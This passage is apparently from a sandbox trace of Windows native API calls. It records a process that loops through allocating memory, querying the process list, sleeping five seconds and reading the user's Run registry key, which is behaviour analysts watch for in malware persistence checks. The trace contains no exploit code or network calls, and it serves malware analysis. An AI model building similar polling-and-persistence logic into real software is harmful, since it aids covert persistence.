(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.926] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.927] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.927] NtClose (Handle=0x274) returned 0x0 [0177.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.939] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.941] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.941] NtClose (Handle=0x274) returned 0x0 [0177.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.950] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.951] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.951] NtClose (Handle=0x274) returned 0x0 [0177.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.962] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.963] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.963] NtClose (Handle=0x274) returned 0x0 [0177.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.980] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.981] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.981] NtClose (Handle=0x274) returned 0x0 [0177.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.992] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.993] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.993] NtClose (Handle=0x274) returned 0x0 [0177.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.001] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.002] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.002] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.002] NtClose (Handle=0x274) returned 0x0 [0178.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.014] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.015] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.015] NtClose (Handle=0x274) returned 0x0 [0178.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.040] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.045] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.046] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.046] NtClose (Handle=0x274) returned 0x0 [0178.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.057] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.058] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.058] NtClose (Handle=0x274) returned 0x0 [0178.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.071] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.072] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.072] NtClose (Handle=0x274) returned 0x0 [0178.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.092] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.093] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.093] NtClose (Handle=0x274) returned 0x0 [0178.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.106] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.107] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.107] NtClose (Handle=0x274) returned 0x0 [0178.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 